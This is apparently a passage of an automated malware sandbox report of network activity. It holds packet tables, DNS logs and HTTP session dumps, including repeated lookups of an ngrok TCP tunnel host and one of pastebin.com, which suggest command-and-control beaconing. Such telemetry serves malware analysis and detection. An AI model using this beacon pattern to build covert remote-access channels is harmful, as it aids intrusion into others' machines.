                                                                    May 2, 2024 06:05:00.148199081 CEST44349853104.20.3.235192.168.2.4
                                                                    May 2, 2024 06:05:00.148314953 CEST44349853104.20.3.235192.168.2.4
                                                                    May 2, 2024 06:05:00.148791075 CEST49853443192.168.2.4104.20.3.235
                                                                    May 2, 2024 06:05:00.149090052 CEST49853443192.168.2.4104.20.3.235
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    May 2, 2024 06:00:58.527153969 CEST53575151.1.1.1192.168.2.4
                                                                    May 2, 2024 06:00:58.529095888 CEST53510871.1.1.1192.168.2.4
                                                                    May 2, 2024 06:00:58.757688046 CEST5520453192.168.2.41.1.1.1
                                                                    May 2, 2024 06:00:58.757848978 CEST5596853192.168.2.41.1.1.1
                                                                    May 2, 2024 06:00:58.845825911 CEST53559681.1.1.1192.168.2.4
                                                                    May 2, 2024 06:00:58.846266031 CEST53552041.1.1.1192.168.2.4
                                                                    May 2, 2024 06:00:59.322350025 CEST53514491.1.1.1192.168.2.4
                                                                    May 2, 2024 06:01:06.606307983 CEST4950253192.168.2.41.1.1.1
                                                                    May 2, 2024 06:01:06.694878101 CEST53495021.1.1.1192.168.2.4
                                                                    May 2, 2024 06:01:12.731882095 CEST5054653192.168.2.41.1.1.1
                                                                    May 2, 2024 06:01:12.825881958 CEST53505461.1.1.1192.168.2.4
                                                                    May 2, 2024 06:01:20.705394030 CEST138138192.168.2.4192.168.2.255
                                                                    May 2, 2024 06:01:20.922117949 CEST53600091.1.1.1192.168.2.4
                                                                    May 2, 2024 06:01:27.111504078 CEST5387553192.168.2.41.1.1.1
                                                                    May 2, 2024 06:01:27.201317072 CEST53538751.1.1.1192.168.2.4
                                                                    May 2, 2024 06:01:40.263478994 CEST53590691.1.1.1192.168.2.4
                                                                    May 2, 2024 06:01:56.105462074 CEST5297453192.168.2.41.1.1.1
                                                                    May 2, 2024 06:01:56.196322918 CEST53529741.1.1.1192.168.2.4
                                                                    May 2, 2024 06:01:59.388899088 CEST53643791.1.1.1192.168.2.4
                                                                    May 2, 2024 06:02:03.500025988 CEST53603351.1.1.1192.168.2.4
                                                                    May 2, 2024 06:02:12.053330898 CEST5077653192.168.2.41.1.1.1
                                                                    May 2, 2024 06:02:12.160744905 CEST53507761.1.1.1192.168.2.4
                                                                    May 2, 2024 06:02:13.590475082 CEST5598453192.168.2.41.1.1.1
                                                                    May 2, 2024 06:02:13.681421041 CEST53559841.1.1.1192.168.2.4
                                                                    May 2, 2024 06:02:26.594948053 CEST53502361.1.1.1192.168.2.4
                                                                    May 2, 2024 06:02:42.171190977 CEST6150353192.168.2.41.1.1.1
                                                                    May 2, 2024 06:02:42.279515982 CEST53615031.1.1.1192.168.2.4
                                                                    May 2, 2024 06:03:13.523962021 CEST53521741.1.1.1192.168.2.4
                                                                    May 2, 2024 06:03:16.391778946 CEST6039553192.168.2.41.1.1.1
                                                                    May 2, 2024 06:03:16.507287979 CEST53603951.1.1.1192.168.2.4
                                                                    May 2, 2024 06:03:54.904954910 CEST6144553192.168.2.41.1.1.1
                                                                    May 2, 2024 06:03:54.998341084 CEST53614451.1.1.1192.168.2.4
                                                                    May 2, 2024 06:04:19.904566050 CEST5047753192.168.2.41.1.1.1
                                                                    May 2, 2024 06:04:19.994776964 CEST53504771.1.1.1192.168.2.4
                                                                    May 2, 2024 06:04:30.398049116 CEST53571381.1.1.1192.168.2.4
                                                                    May 2, 2024 06:04:45.594362020 CEST5459653192.168.2.41.1.1.1
                                                                    May 2, 2024 06:04:45.701400995 CEST53545961.1.1.1192.168.2.4
                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    May 2, 2024 06:00:58.757688046 CEST192.168.2.41.1.1.10xef91Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                    May 2, 2024 06:00:58.757848978 CEST192.168.2.41.1.1.10xdeceStandard query (0)www.google.com65IN (0x0001)false
                                                                    May 2, 2024 06:01:06.606307983 CEST192.168.2.41.1.1.10xc030Standard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                                    May 2, 2024 06:01:12.731882095 CEST192.168.2.41.1.1.10x52f3Standard query (0)0.tcp.eu.ngrok.ioA (IP address)IN (0x0001)false
                                                                    May 2, 2024 06:01:27.111504078 CEST192.168.2.41.1.1.10x88b5Standard query (0)0.tcp.eu.ngrok.ioA (IP address)IN (0x0001)false
                                                                    May 2, 2024 06:01:56.105462074 CEST192.168.2.41.1.1.10xb4bdStandard query (0)0.tcp.eu.ngrok.ioA (IP address)IN (0x0001)false
                                                                    May 2, 2024 06:02:12.053330898 CEST192.168.2.41.1.1.10x4418Standard query (0)0.tcp.eu.ngrok.ioA (IP address)IN (0x0001)false
                                                                    May 2, 2024 06:02:13.590475082 CEST192.168.2.41.1.1.10x48f5Standard query (0)0.tcp.eu.ngrok.ioA (IP address)IN (0x0001)false
                                                                    May 2, 2024 06:02:42.171190977 CEST192.168.2.41.1.1.10x9844Standard query (0)0.tcp.eu.ngrok.ioA (IP address)IN (0x0001)false
                                                                    May 2, 2024 06:03:16.391778946 CEST192.168.2.41.1.1.10xdc69Standard query (0)0.tcp.eu.ngrok.ioA (IP address)IN (0x0001)false
                                                                    May 2, 2024 06:03:54.904954910 CEST192.168.2.41.1.1.10x117cStandard query (0)0.tcp.eu.ngrok.ioA (IP address)IN (0x0001)false
                                                                    May 2, 2024 06:04:19.904566050 CEST192.168.2.41.1.1.10x7e7dStandard query (0)0.tcp.eu.ngrok.ioA (IP address)IN (0x0001)false
                                                                    May 2, 2024 06:04:45.594362020 CEST192.168.2.41.1.1.10xec25Standard query (0)0.tcp.eu.ngrok.ioA (IP address)IN (0x0001)false
                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    May 2, 2024 06:00:58.845825911 CEST1.1.1.1192.168.2.40xdeceNo error (0)www.google.com65IN (0x0001)false
                                                                    May 2, 2024 06:00:58.846266031 CEST1.1.1.1192.168.2.40xef91No error (0)www.google.com142.251.40.228A (IP address)IN (0x0001)false
                                                                    May 2, 2024 06:01:06.694878101 CEST1.1.1.1192.168.2.40xc030No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                                    May 2, 2024 06:01:06.694878101 CEST1.1.1.1192.168.2.40xc030No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                                    May 2, 2024 06:01:06.694878101 CEST1.1.1.1192.168.2.40xc030No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                                    May 2, 2024 06:01:12.825881958 CEST1.1.1.1192.168.2.40x52f3No error (0)0.tcp.eu.ngrok.io18.192.31.165A (IP address)IN (0x0001)false
                                                                    May 2, 2024 06:01:27.201317072 CEST1.1.1.1192.168.2.40x88b5No error (0)0.tcp.eu.ngrok.io3.125.102.39A (IP address)IN (0x0001)false
                                                                    May 2, 2024 06:01:56.196322918 CEST1.1.1.1192.168.2.40xb4bdNo error (0)0.tcp.eu.ngrok.io18.192.31.165A (IP address)IN (0x0001)false
                                                                    May 2, 2024 06:02:12.160744905 CEST1.1.1.1192.168.2.40x4418No error (0)0.tcp.eu.ngrok.io3.125.209.94A (IP address)IN (0x0001)false
                                                                    May 2, 2024 06:02:13.681421041 CEST1.1.1.1192.168.2.40x48f5No error (0)0.tcp.eu.ngrok.io3.124.142.205A (IP address)IN (0x0001)false
                                                                    May 2, 2024 06:02:42.279515982 CEST1.1.1.1192.168.2.40x9844No error (0)0.tcp.eu.ngrok.io18.158.249.75A (IP address)IN (0x0001)false
                                                                    May 2, 2024 06:03:16.507287979 CEST1.1.1.1192.168.2.40xdc69No error (0)0.tcp.eu.ngrok.io3.124.142.205A (IP address)IN (0x0001)false
                                                                    May 2, 2024 06:03:54.998341084 CEST1.1.1.1192.168.2.40x117cNo error (0)0.tcp.eu.ngrok.io3.125.209.94A (IP address)IN (0x0001)false
                                                                    May 2, 2024 06:04:19.994776964 CEST1.1.1.1192.168.2.40x7e7dNo error (0)0.tcp.eu.ngrok.io3.124.142.205A (IP address)IN (0x0001)false
                                                                    May 2, 2024 06:04:45.701400995 CEST1.1.1.1192.168.2.40xec25No error (0)0.tcp.eu.ngrok.io3.125.102.39A (IP address)IN (0x0001)false
                                                                    • www.google.com
                                                                    • fs.microsoft.com
                                                                    • pastebin.com
                                                                    • slscr.update.microsoft.com
                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.449733142.251.40.2284437256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:00:59 UTC607OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                    Host: www.google.com
                                                                    Connection: keep-alive
                                                                    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                    Sec-Fetch-Site: none
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: empty
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-05-02 04:00:59 UTC1703INHTTP/1.1 200 OK
                                                                    Date: Thu, 02 May 2024 04:00:59 GMT
                                                                    Pragma: no-cache
                                                                    Expires: -1
                                                                    Cache-Control: no-cache, must-revalidate
                                                                    Content-Type: text/javascript; charset=UTF-8
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-pe6bjCzGjkooQS4vmxDPLA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                    Accept-CH: Sec-CH-UA-Platform
                                                                    Accept-CH: Sec-CH-UA-Platform-Version
                                                                    Accept-CH: Sec-CH-UA-Full-Version
                                                                    Accept-CH: Sec-CH-UA-Arch
                                                                    Accept-CH: Sec-CH-UA-Model
                                                                    Accept-CH: Sec-CH-UA-Bitness
                                                                    Accept-CH: Sec-CH-UA-Full-Version-List
                                                                    Accept-CH: Sec-CH-UA-WoW64
                                                                    Permissions-Policy: unload=()
                                                                    Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                    Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                    Content-Disposition: attachment; filename="f.txt"
                                                                    Server: gws
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Accept-Ranges: none
                                                                    Vary: Accept-Encoding
                                                                    Connection: close
                                                                    Transfer-Encoding: chunked
                                                                    2024-05-02 04:00:59 UTC477INData Raw: 31 64 36 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 74 72 6f 79 20 6d 6f 72 61 6e 20 68 61 72 74 20 68 69 67 68 20 73 63 68 6f 6f 6c 20 70 72 69 6e 63 69 70 61 6c 22 2c 22 61 6d 64 20 73 74 6f 63 6b 73 22 2c 22 64 6f 64 67 65 72 73 20 62 61 73 65 62 61 6c 6c 22 2c 22 74 6f 64 61 79 20 77 6f 72 64 6c 65 20 61 6e 73 77 65 72 22 2c 22 74 61 67 20 68 65 75 65 72 20 66 6f 72 6d 75 6c 61 20 31 20 6b 69 74 68 22 2c 22 63 6f 6e 63 65 72 74 20 77 65 65 6b 20 24 32 35 20 74 69 63 6b 65 74 73 22 2c 22 67 6f 6f 67 6c 65 20 6c 61 79 6f 66 66 73 20 74 6f 64 61 79 22 2c 22 62 6a 20 77 65 73 74 20 64 65 6e 76 65 72 20 62 72 6f 6e 63 6f 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e
                                                                    Data Ascii: 1d6)]}'["",["troy moran hart high school principal","amd stocks","dodgers baseball","today wordle answer","tag heuer formula 1 kith","concert week $25 tickets","google layoffs today","bj west denver broncos"],["","","","","","","",""],[],{"google:clien
                                                                    2024-05-02 04:00:59 UTC1255INData Raw: 62 30 65 0d 0a 76 63 47 35 6e 4f 32 4a 68 63 32 55 32 4e 43 78 70 56 6b 4a 50 55 6e 63 77 53 30 64 6e 62 30 46 42 51 55 46 4f 55 31 56 6f 52 56 56 6e 51 55 46 42 52 44 52 42 51 55 46 43 51 55 4e 42 54 55 46 42 51 55 49 78 54 6e 70 55 53 45 46 42 51 55 46 75 4d 55 4a 4e 56 6b 56 59 4c 79 38 76 4f 45 46 56 63 47 64 42 56 55 70 6a 51 56 4a 77 54 55 46 51 4e 55 46 42 55 31 70 52 51 56 52 61 57 55 46 53 53 6b 6c 42 55 56 70 46 51 56 59 31 64 55 70 76 4f 46 46 42 54 32 38 33 63 6a 63 76 56 55 46 54 4e 56 56 42 54 30 6b 7a 4d 54 6b 76 63 6e 68 59 52 69 38 31 64 7a 68 54 59 58 4e 4e 65 47 35 70 4e 32 46 75 64 58 52 4b 53 32 56 4c 65 6e 70 6d 57 43 39 36 5a 31 6c 51 4f 54 5a 31 63 6a 4e 79 4e 30 51 34 4d 7a 6b 76 4e 48 51 33 61 69 73 34 4c 31 42 32 55 57 74 69 4b
                                                                    Data Ascii: b0evcG5nO2Jhc2U2NCxpVkJPUncwS0dnb0FBQUFOU1VoRVVnQUFBRDRBQUFCQUNBTUFBQUIxTnpUSEFBQUFuMUJNVkVYLy8vOEFVcGdBVUpjQVJwTUFQNUFBU1pRQVRaWUFSSklBUVpFQVY1dUpvOFFBT283cjcvVUFTNVVBT0kzMTkvcnhYRi81dzhTYXNNeG5pN2FudXRKS2VLenpmWC96Z1lQOTZ1cjNyN0Q4MzkvNHQ3ais4L1B2UWtiK
                                                                    2024-05-02 04:00:59 UTC1255INData Raw: 69 39 4c 65 54 64 56 59 53 39 47 51 32 31 44 65 6a 68 4d 56 56 56 6a 53 48 56 56 4e 31 59 79 52 53 74 76 62 47 51 34 64 6d 6c 43 4e 54 4a 50 55 48 5a 50 4e 32 70 6f 62 44 6c 61 4f 56 55 34 4f 46 5a 72 55 45 73 30 4e 44 5a 49 52 30 6c 36 61 55 39 55 53 43 74 79 5a 54 55 32 55 55 78 45 55 69 39 52 57 6b 56 57 62 6a 49 72 63 30 70 49 53 47 68 48 54 30 59 32 53 45 4d 30 62 46 6c 35 4d 54 6b 33 57 47 46 52 64 6b 39 68 57 54 42 50 61 57 68 30 62 44 46 7a 64 57 46 4c 65 6b 68 5a 61 32 46 70 57 45 55 32 59 32 52 72 63 6d 6c 4d 65 57 38 31 52 6a 42 6a 4d 6b 70 34 4d 48 4a 79 54 33 5a 58 51 56 63 31 61 6c 68 69 59 6c 41 35 59 6c 70 74 4f 55 56 31 61 55 74 71 53 30 31 6b 62 55 6c 5a 51 7a 4a 48 65 55 74 5a 61 57 6c 52 5a 47 56 43 56 33 6c 6f 55 6a 64 6c 52 6a 6c 4a
                                                                    Data Ascii: i9LeTdVYS9GQ21DejhMVVVjSHVVN1YyRStvbGQ4dmlCNTJPUHZPN2pobDlaOVU4OFZrUEs0NDZIR0l6aU9USCtyZTU2UUxEUi9RWkVWbjIrc0pISGhHT0Y2SEM0bFl5MTk3WGFRdk9hWTBPaWh0bDFzdWFLekhZa2FpWEU2Y2RrcmlMeW81RjBjMkp4MHJyT3ZXQVc1alhiYlA5YlptOUV1aUtqS01kbUlZQzJHeUtZaWlRZGVCV3loUjdlRjlJ
                                                                    2024-05-02 04:00:59 UTC327INData Raw: 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 72 65 6c 65 76 61 6e 63 65 22 3a 5b 31 32 35 37 2c 31 32 35 36 2c 31 32 35 35 2c 31 32 35 34 2c 31 32 35 33 2c 31 32 35 32 2c 31 32 35 31 2c 31 32 35 30 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 73 75 62 74 79 70 65 73 22 3a 5b 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 74 79 70 65
                                                                    Data Ascii: 002},{"zl":10002},{"zl":10002},{"zl":10002}],"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],"google:suggesttype
                                                                    2024-05-02 04:00:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                    Data Ascii: 0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.449734142.251.40.2284437256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:00:59 UTC510OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                    Host: www.google.com
                                                                    Connection: keep-alive
                                                                    X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                    Sec-Fetch-Site: cross-site
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: empty
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-05-02 04:00:59 UTC1843INHTTP/1.1 302 Found
                                                                    Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGPufzLEGIjDqkokB_Yx903z9S8-TdyWhW8iPlrZBrgRiiMPzrxlLxgoQH634QKXADTY9t1vdNmMyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                    x-hallmonitor-challenge: CgwI-5_MsQYQ4pjfuwISBL9gluE
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Strict-Transport-Security: max-age=31536000
                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                    Permissions-Policy: unload=()
                                                                    Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                    Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                    Date: Thu, 02 May 2024 04:00:59 GMT
                                                                    Server: gws
                                                                    Content-Length: 458
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    Set-Cookie: 1P_JAR=2024-05-02-04; expires=Sat, 01-Jun-2024 04:00:59 GMT; path=/; domain=.google.com; Secure; SameSite=none
                                                                    Set-Cookie: NID=513=TDdb6B1qf0imS6sQ9UI386TSBmUeGbONEAs1g_SjFnFVZT8tlWjduo1BWv8tK_X2kdpw5DyqH6DyKssZClnoNAKybygsq-HKlTpEzxscqZJ_pjS1BKmEZAqlwshMLYfbeJHYWJdOjDcEir8XmubnkA88KvIUU07OLdpJjmvAUwk; expires=Fri, 01-Nov-2024 04:00:59 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close
                                                                    2024-05-02 04:00:59 UTC458INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 25 33 46 68
                                                                    Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fh


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    2192.168.2.449735142.251.40.2284437256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:00:59 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                    Host: www.google.com
                                                                    Connection: keep-alive
                                                                    Sec-Fetch-Site: cross-site
                                                                    Sec-Fetch-Mode: no-cors
                                                                    Sec-Fetch-Dest: empty
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2024-05-02 04:00:59 UTC1761INHTTP/1.1 302 Found
                                                                    Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGPufzLEGIjDTt_akc_527nJ4zoGCbAZn0AkDcVIV2VLuAM78mz4Tuc4onQdlIzVDE6yNOrZBZH0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                    x-hallmonitor-challenge: CgwI-5_MsQYQoY6IyAISBL9gluE
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                    Permissions-Policy: unload=()
                                                                    Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                    Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                    Date: Thu, 02 May 2024 04:00:59 GMT
                                                                    Server: gws
                                                                    Content-Length: 417
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    Set-Cookie: 1P_JAR=2024-05-02-04; expires=Sat, 01-Jun-2024 04:00:59 GMT; path=/; domain=.google.com; Secure; SameSite=none
                                                                    Set-Cookie: NID=513=aQLl8l_IdrdIG_vG9LZErLEffD0-yJ-HZriWrJveyjO1itgPJ6dl8zB9N0d-QezZoOt2n3nDN-AnNT-K9r0paQnY7wviknPkibpSoCsSrQVL1ZjpMYLQ1zLgwfC-Lo9S6ISgMklsM0jGn4_SiIk4-TVyzohylPezEXFI0fi2jmA; expires=Fri, 01-Nov-2024 04:00:59 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close
                                                                    2024-05-02 04:00:59 UTC417INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 26
                                                                    Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    3192.168.2.449736142.251.40.2284437256C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-05-02 04:01:01 UTC738OUTGET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGPufzLEGIjDTt_akc_527nJ4zoGCbAZn0AkDcVIV2VLuAM78mz4Tuc4onQdlIzVDE6yNOrZBZH0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                    Host: www.google.com
                                                                    Connection: keep-alive
